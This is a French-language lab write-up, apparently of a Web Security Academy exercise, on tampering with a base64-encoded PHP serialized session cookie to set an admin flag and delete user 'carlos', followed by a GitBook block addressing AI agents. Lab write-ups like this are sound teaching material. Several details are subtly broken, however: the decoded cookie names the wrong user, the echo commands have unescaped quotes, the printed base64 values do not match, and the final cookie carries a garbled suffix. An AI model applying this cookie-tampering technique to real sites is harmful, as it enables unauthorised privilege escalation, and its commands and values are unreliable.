> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/fr/web/deserialization/editing-serialized-objects.md).

# Modification d’objets sérialisés

### Modification d’objets sérialisés

Ce laboratoire utilise un mécanisme de session basé sur **la sérialisation** et présente une vulnérabilité qui permet **l’élévation de privilèges**. / L’objectif est de modifier l’objet sérialisé stocké dans le cookie de session pour obtenir des privilèges d’administrateur, puis supprimer l’utilisateur **carlos**.

Un compte utilisateur est fourni pour commencer :

* **Identifiant**: wiener
* **Mot de passe**: peter

**Observation initiale**

Après authentification, une requête de connexion est envoyée :

```http
POST /login HTTP/2
Host: 0a66003e03add3bb824ef63c001200c9.web-security-academy.net
Cookie: session=
Content-Length: 30

username=wiener&password=peter
```

Le serveur répond avec un cookie de session :

```http
Set-Cookie: session=Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czo1OiJhZG1pbiI7YjowO30%3d;
```

**Analyse du cookie de session**

Le contenu du cookie est encodé en Base64. / Une fois décodé, vous obtenez un objet PHP sérialisé :

```bash
O:4:"User":2:{s:8:"username";s:6:"carlos";s:5:"admin";b:0;}
```

Cet objet contient :

* nom d’utilisateur (`le nom d'utilisateur`)
* un indicateur de privilèges administrateur (`admin`), défini dans `faux` (`b:0`)

```http
echo "O:4:"User":2:{s:8:"username";s:6:"carlos";s:5:"admin";b:0;}" | base64 ; echo
```

Encodage de l’objet en Base64 :

```bash
Tzo0OlVzZXI6Mjp7czo4OnVzZXJuYW1lO3M6NjpjYXJsb3M7czo1OmFkbWluO2I6MDt9Cg==
```

<figure><img src="/files/d138c26ace9ce8f1a514805c632209cd5a3a9d26" alt=""><figcaption></figcaption></figure>

**Modification de l’objet sérialisé**

L’objet peut être modifié côté client avant d’être renvoyé au serveur.

1. Changement du nom d’utilisateur en **carlos**:
2. Activation des privilèges d’administrateur en passant `admin` en `vrai`:

```bash
echo "O:4:"User":2:{s:8:"username";s:6:"carlos";s:5:"admin";b:1;}" | base64 ; echo
```

3. Encodage de l’objet en Base64 :

```bash
Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6ImNhcmxvcyI7czo1OiJhZG1pbiI7YjoxO30lM2Q=
```

**Exploitation**

Le cookie de session est remplacé par la nouvelle valeur modifiée.

<figure><img src="/files/ed0db6caacf0f4bae4313edbb0f41e7bf09af48e" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/fr/web/deserialization/editing-serialized-objects.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
